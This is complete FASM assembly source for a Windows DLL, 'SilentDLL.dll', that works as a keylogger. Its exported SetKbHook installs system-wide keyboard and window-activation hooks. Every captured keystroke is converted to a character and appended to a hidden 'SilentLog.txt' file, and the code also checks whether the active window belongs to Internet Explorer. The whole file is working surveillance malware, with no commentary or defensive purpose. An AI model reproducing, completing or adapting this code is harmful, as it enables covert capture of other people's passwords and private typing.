format PE GUI DLL
entry EntryPoint

; preprocessor data

CREATE_ALWAYS		  equ 2
OPEN_ALWAYS	  	  equ 4
FILE_ATTRIBUTE_NORMAL	  equ 080h
GENERIC_READWRITE	  equ 0C0000000h
HC_ACTION		  equ 0

FILE_END		  equ 2

VK_RETURN		  equ 0Dh	
VK_SPACE		  equ 20h	

WH_CBT			  equ 5
WH_KEYBOARD		  equ 2
HCBT_ACTIVATE		  equ 5

DLL_PROCESS_DETACH 	  equ 0
DLL_PROCESS_ATTACH 	  equ 1
DLL_THREAD_ATTACH  	  equ 2
DLL_THREAD_DETACH  	  equ 3

; own defines

TXTLENGTH		  equ 10

section ".data" data readable writeable

	;Strings
	
	_str_filename db "\SilentLog.txt", 0

	;Ordinary data

	_hHook dd 0h
	_hHookMsg dd 0h

	_bHooked db 0h
	_IEActive db 0h

	_hInst dd 0h

	_ks:
	times 256 db 0h

	_hFile dd 0h

	_text:
	times TXTLENGTH db 0h

section ".text" code readable executable

	EntryPoint:

	hInstDLL equ ebp+8
	fdwReason equ ebp+12
	lpvReserved equ evp+16

		push ebp
		mov ebp, esp

		cmp dword [fdwReason], DLL_PROCESS_ATTACH
		jne .lbl_no_load

		mov eax, [hInstDLL]
		mov [_hInst], eax

	.lbl_no_load:

		mov eax, 1

	.end:
		pop ebp
		ret 12

	; end EntryPoint

	CBTProc:
	
	code equ ebp+8
	wParam equ ebp+12
	lParam equ ebp+16

		push ebp
		mov ebp, esp

		cmp dword [code], HCBT_ACTIVATE
		jne .lbl_no_activate

		push dword TXTLENGTH
		push dword _text
		push dword [wParam]
		call dword [GetClassName]
		
		cmp byte [_text+0], 'I'
		jne .lbl_no_ie
		cmp byte [_text+1], 'E'
		jne .lbl_no_ie

		mov byte [_IEActive], 1
		jmp .lbl_end_ie

	.lbl_no_ie:

		mov byte [_IEActive], 0

	.lbl_end_ie:

	.lbl_no_activate:

		push dword [lParam]
		push dword [wParam]
		push dword [code]
		push dword [_hHookMsg]
		call dword [CallNextHookEx]

	.end:

		pop ebp
		ret 12

	; end CBTProc

	KeyboardProc:

	code equ ebp+8
	wParam equ ebp+12
	lParam equ ebp+16

		push ebp
		mov ebp, esp
		sub esp, 8

	ch equ ebp-1
	w equ ebp-3
	scan equ ebp-7
		
		mov eax, [lParam]
		test eax, 40000000h
		jz .lbl_no_logkey

		cmp dword [code], HC_ACTION
		jne .lbl_no_logkey

		cmp word [wParam], VK_SPACE
		je .lbl_logkey
		cmp word [wParam], VK_RETURN
		je .lbl_logkey
		cmp dword [wParam], 2Fh
		jb .lbl_no_logkey
		cmp dword [wParam], 100h
		jbe .lbl_logkey

		jmp .lbl_no_logkey

	.lbl_logkey:

		push dword 0
		push dword FILE_ATTRIBUTE_NORMAL
		push dword OPEN_ALWAYS
		push dword 0
		push dword 0
		push dword GENERIC_READWRITE
		push dword _str_filename
		call dword [CreateFile]
		mov [_hFile], eax

		push dword FILE_END
		push dword 0
		push dword 0
		push dword [_hFile]
		call dword [SetFilePointer]

		cmp word [wParam], VK_RETURN
		jne .lbl_noenter
	
	; .lbl_enter:

		mov byte [ch], 0Dh

		push dword 0
		lea eax, [scan]
		push eax
		push dword 1
		lea eax, [ch]
		push eax
		push dword [_hFile]
		call dword [WriteFile]

		mov byte [ch], 0Ah

		push dword 0
		lea eax, [scan]
		push eax
		push dword 1
		lea eax, [ch]
		push eax
		push dword [_hFile]
		call dword [WriteFile]

		jmp .lbl_end_enter

	.lbl_noenter:

		push dword _ks
		call dword [GetKeyboardState]

		mov dword [scan], 0
		push dword 0
		lea eax, [w]
		push eax
		push dword _ks
		push dword [scan]
		push dword [wParam]
		call dword [ToAscii]
		mov al, [w]
		mov [ch], al

		push dword 0
		lea eax, [scan]
		push eax
		push dword 1
		lea eax, [ch]
		push eax
		push dword [_hFile]
		call dword [WriteFile]

	.lbl_end_enter:

		push dword [_hFile]
		call dword [CloseHandle]

	.lbl_no_logkey:

	.lbl_nexthook:

		push dword [lParam]
		push dword [wParam]
		push dword [code]
		push dword [_hHook]
		call dword [CallNextHookEx]

	.end:

		add esp, 8
		pop ebp
		ret 12

	; end KeyBoardProc

	RemoveKbHook:

		push ebp
		mov ebp, esp

		cmp byte [_bHooked], 1
		jne .end

		push dword [_hHook]
		call dword [UnhookWindowsHookEx]

		push dword [_hHookMsg]
		call dword [UnhookWindowsHookEx]

		mov byte [_bHooked], 0

	.end:
	
		pop ebp
		ret

	; end RemoveKbHook

	SetKbHook:
	
		push ebp
		mov ebp, esp

		cmp byte [_bHooked], 0
		jne .end

		push dword 0
		push dword [_hInst]
		push dword KeyboardProc
		push dword WH_KEYBOARD
		call dword [SetWindowsHookEx]
		mov dword [_hHook], eax

		push dword 0
		push dword [_hInst]
		push dword CBTProc
		push dword WH_CBT
		call dword [SetWindowsHookEx]
		mov dword [_hHookMsg], eax
		
		mov byte [_bHooked], 1		

	.end:

		pop ebp
		ret

	; end SetKbHook

section ".idata" import data readable writeable

	dd 0, 0, 0, rva str_kernel, rva kernel
	dd 0, 0, 0, rva str_user, rva user
	dd 0, 0, 0, 0, 0

	str_kernel db "KERNEL32.DLL", 0
	str_user db "USER32.DLL", 0

	kernel:

		CloseHandle dd rva str_CloseHandle
		CreateFile dd rva str_CreateFile
		SetFilePointer dd rva str_SetFilePointer
		WriteFile dd rva str_WriteFile
		dd 0

		str_CloseHandle db 0, 0, "CloseHandle", 0
		str_CreateFile db 0, 0, "CreateFileA", 0
		str_SetFilePointer db 0, 0, "SetFilePointer", 0
		str_WriteFile db 0, 0, "WriteFile", 0

	user:

		CallNextHookEx dd rva str_CallNextHookEx
		GetClassName dd rva str_GetClassName
		GetKeyboardState dd rva str_GetKeyboardState
		SetWindowsHookEx dd rva str_SetWindowsHookEx
		ToAscii dd rva str_ToAscii
		UnhookWindowsHookEx dd rva str_UnhookWindowsHookEx
		dd 0

		str_CallNextHookEx db 0, 0, "CallNextHookEx", 0
		str_GetClassName db 0, 0, "GetClassNameA", 0
		str_GetKeyboardState db 0, 0, "GetKeyboardState", 0
		str_SetWindowsHookEx db 0, 0, "SetWindowsHookExA", 0
		str_ToAscii db 0, 0, "ToAscii", 0
		str_UnhookWindowsHookEx db 0, 0, "UnhookWindowsHookEx", 0

section ".edata" export data readable

	dd 0, 0, 0, rva str_DLLName, 1
	dd 2, 2, rva addresses, rva names, rva ordinal

	addresses:

		dd rva RemoveKbHook
		dd rva SetKbHook

	names:

		dd rva str_RemoveKbHook
		dd rva str_SetKbHook

	ordinal:

		dw 0
		dw 1

	str_DLLName db "SilentDLL.dll", 0

		str_RemoveKbHook db "RemoveKbHook", 0
		str_SetKbHook db "SetKbHook", 0

section ".reloc" fixups data readable discardable